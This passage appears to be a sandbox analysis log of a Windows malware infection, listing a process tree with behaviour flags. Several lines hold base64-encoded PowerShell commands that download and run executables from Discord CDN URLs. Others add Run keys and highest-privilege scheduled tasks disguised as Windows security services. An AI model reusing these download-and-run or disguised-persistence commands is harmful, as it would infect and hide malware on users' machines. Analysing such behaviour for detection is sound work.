- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WHost';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WHost' -Value '"C:\Users\Admin\AppData\Roaming\WHost\WHost.exe"' -PropertyType 'String'
10⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5920

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
10⤵
PID:5984

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \WHost /tr "C:\Users\Admin\AppData\Roaming\WHost\WHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
10⤵
PID:5960

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\CSiI2cJakt.exe
6⤵
- Suspicious use of WriteProcessMemory
PID:3408

C:\Users\Admin\AppData\Local\Temp\CSiI2cJakt.exe
C:\Users\Admin\AppData\Local\Temp\CSiI2cJakt.exe
7⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeABuACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADAANgA5ADQANAA2ADQANwAxADkAMwAvAGwAbABpAHAAZQBkAGUAZQBkAGQALgBlAHgAZQAnACwAIAA8ACMAYQB6AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwByAHoAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAGoAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzAC4AZQB4AGUAJwApACkAPAAjAHkAcgBqACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAcwBmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAGoAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzAC4AZQB4AGUAJwApADwAIwBqAHMAcwAjAD4A"
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4896

C:\Users\Admin\AppData\Roaming\3.exe
"C:\Users\Admin\AppData\Roaming\3.exe"
9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5180

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
10⤵
PID:5916

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\HHARrI0l8D.exe
6⤵
- Suspicious use of WriteProcessMemory
PID:512

C:\Users\Admin\AppData\Local\Temp\HHARrI0l8D.exe
C:\Users\Admin\AppData\Local\Temp\HHARrI0l8D.exe
7⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAbgBkACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADEANwAzADkANgA4ADQAOAA3ADUAMQAvAFMAZQBjAHUAcgBpAHQAeQAuAGUAeABlACcALAAgADwAIwBpAHIAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAeABmACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGMAdgBrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQALgBlAHgAZQAnACkAKQA8ACMAcQBmAGQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBiAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAeQByACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQALgBlAHgAZQAnACkAPAAjAGIAeABpACMAPgA="
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5036

C:\Users\Admin\AppData\Roaming\4.exe
"C:\Users\Admin\AppData\Roaming\4.exe"
9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4564

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
10⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
10⤵
PID:1304

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:4772

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
10⤵
PID:2716

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\Ds1LDOEyjt.exe
6⤵
- Suspicious use of WriteProcessMemory
PID:1396

C:\Users\Admin\AppData\Local\Temp\Ds1LDOEyjt.exe
C:\Users\Admin\AppData\Local\Temp\Ds1LDOEyjt.exe
7⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAcwBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADMANAA2ADMANQA0ADQAMgAxADcANgAvAFcAaQBuAEYAbwByAG0ALgBlAHgAZQAnACwAIAA8ACMAeQB4AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBrAHYAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBhAHYAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA1AC4AZQB4AGUAJwApACkAPAAjAGIAbQBmACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHgAegBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwByAGkAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA1AC4AZQB4AGUAJwApADwAIwB6AHIAcwAjAD4A"
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1804

C:\Users\Admin\AppData\Roaming\5.exe
"C:\Users\Admin\AppData\Roaming\5.exe"
9⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2280

C:\Users\Admin\AppData\Roaming\5.exe
"C:\Users\Admin\AppData\Roaming\5.exe"
10⤵
- Executes dropped EXE
PID:5948

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\GjKI4UESBN.exe
6⤵
- Suspicious use of WriteProcessMemory
PID:4016

C:\Users\Admin\AppData\Local\Temp\GjKI4UESBN.exe
C:\Users\Admin\AppData\Local\Temp\GjKI4UESBN.exe
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:2236

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\mNU33xPs28.exe
6⤵
PID:1344

C:\Users\Admin\AppData\Local\Temp\mNU33xPs28.exe
C:\Users\Admin\AppData\Local\Temp\mNU33xPs28.exe
7⤵
PID:2652

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\S48sKmJLIF.exe
6⤵
PID:3412

C:\Users\Admin\AppData\Local\Temp\S48sKmJLIF.exe
C:\Users\Admin\AppData\Local\Temp\S48sKmJLIF.exe
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:1316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAawBoACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADkANgA1ADEAOAAyADEAMQA2ADAANAAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAG0AagBuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZgBlAGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegBsAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOAAuAGUAeABlACcAKQApADwAIwBmAHMAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AGoAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwBpAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOAAuAGUAeABlACcAKQA8ACMAYgBpAHAAIwA+AA=="
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4360

C:\Users\Admin\AppData\Roaming\8.exe
"C:\Users\Admin\AppData\Roaming\8.exe"
9⤵
- Executes dropped EXE
PID:5144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 816
10⤵
- Program crash
PID:5176

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\TBvbn5FGMT.exe
6⤵
PID:3164

C:\Users\Admin\AppData\Local\Temp\TBvbn5FGMT.exe
C:\Users\Admin\AppData\Local\Temp\TBvbn5FGMT.exe
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:1592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAYQB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADkANgA4ADUANwA5ADQANgAxADMAMgAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGUAawB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABjAGwAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwB1AGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOQAuAGUAeABlACcAKQApADwAIwB2AHoAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AGsAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZAByAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOQAuAGUAeABlACcAKQA8ACMAcQBnAGIAIwA+AA=="
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628

C:\Users\Admin\AppData\Roaming\9.exe
"C:\Users\Admin\AppData\Roaming\9.exe"
9⤵
- Executes dropped EXE
PID:5216

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\pI7A0t4Z9N.exe
6⤵
PID:4652

C:\Users\Admin\AppData\Local\Temp\pI7A0t4Z9N.exe
C:\Users\Admin\AppData\Local\Temp\pI7A0t4Z9N.exe
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:4532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAZQBiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA2ADcANAA3ADkAMQA1ADMANgA4ADQANwA4ADcAMwA2ADEALwAxADAANgA3ADQANwA5ADQANgA5ADQANQA3ADEANQAwADAAMgA0AC8AbABjAG8AbQBwAGwAYwBtAHAAbwAuAGUAeABlACcALAAgADwAIwB5AGYAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AawB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAYQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEAMQAuAGUAeABlACcAKQApADwAIwBqAHYAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGwAegAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbAB2AGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAxAC4AZQB4AGUAJwApADwAIwB5AG4AdgAjAD4A"
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4520

C:\Users\Admin\AppData\Roaming\11.exe
"C:\Users\Admin\AppData\Roaming\11.exe"
9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5880

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
10⤵
PID:5704

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\xhE0ft0B5U.exe
6⤵
PID:4816

C:\Users\Admin\AppData\Local\Temp\xhE0ft0B5U.exe
C:\Users\Admin\AppData\Local\Temp\xhE0ft0B5U.exe
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:2652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAZABoACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA2ADcANAA3ADkAMQA1ADMANgA4ADQANwA4ADcAMwA2ADEALwAxADAANgA3ADQANwA5ADUAMAA3ADUANQA4ADIAMQA1ADYAOAAwAC8AcABsAGwAbQBtAGQAaQBpAHAAbQAuAGUAeABlACcALAAgADwAIwB3AHoAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAcAB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAYQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEAMgAuAGUAeABlACcAKQApADwAIwBmAHQAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBlAGIAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdAB0AHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAyAC4AZQB4AGUAJwApADwAIwBtAHMAdAAjAD4A"
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1276

C:\Users\Admin\AppData\Roaming\12.exe
"C:\Users\Admin\AppData\Roaming\12.exe"
9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4592

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
10⤵
PID:5104

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\1kpScgE4PS.exe
6⤵
PID:5060

C:\Users\Admin\AppData\Local\Temp\1kpScgE4PS.exe
C:\Users\Admin\AppData\Local\Temp\1kpScgE4PS.exe
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:4784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAaABsACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQA0ADEAMwA5ADQANQA1ADMAMgA1ADAANgAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAHIAdwB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZABmAHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBuAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAwAC4AZQB4AGUAJwApACkAPAAjAHQAZgBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHUAaQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGwAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxADAALgBlAHgAZQAnACkAPAAjAHAAawBqACMAPgA="
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5244

C:\Users\Admin\AppData\Roaming\10.exe
"C:\Users\Admin\AppData\Roaming\10.exe"
9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3824

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
10⤵
- Suspicious use of AdjustPrivilegeToken
PID:5044

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
10⤵
PID:5168

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:1876

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
10⤵
PID:5528

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\whwbnynKNT.exe
6⤵
PID:4216

C:\Users\Admin\AppData\Local\Temp\whwbnynKNT.exe
C:\Users\Admin\AppData\Local\Temp\whwbnynKNT.exe
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:1652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAZAB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADIANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA2ADcANAA3ADkAMQA1ADMANgA4ADQANwA4ADcAMwA2ADEALwAxADAANgA3ADQANwA5ADUAMAA3ADkAMQAwADUAMwAzADEAMwAxAC8AQwBSAC4AZQB4AGUAJwAsACAAPAAjAGEAcQB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZwBmAHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcwBkAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAzAC4AZQB4AGUAJwApACkAPAAjAGoAbQBiACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGUAcQBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB0AGQAZgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxADMALgBlAHgAZQAnACkAPAAjAHoAegBsACMAPgA="
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5280

C:\Users\Admin\AppData\Roaming\13.exe
"C:\Users\Admin\AppData\Roaming\13.exe"
9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2468

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'
10⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:5896

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
10⤵
PID:6024

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:1168

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
10⤵
PID:5496

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:388

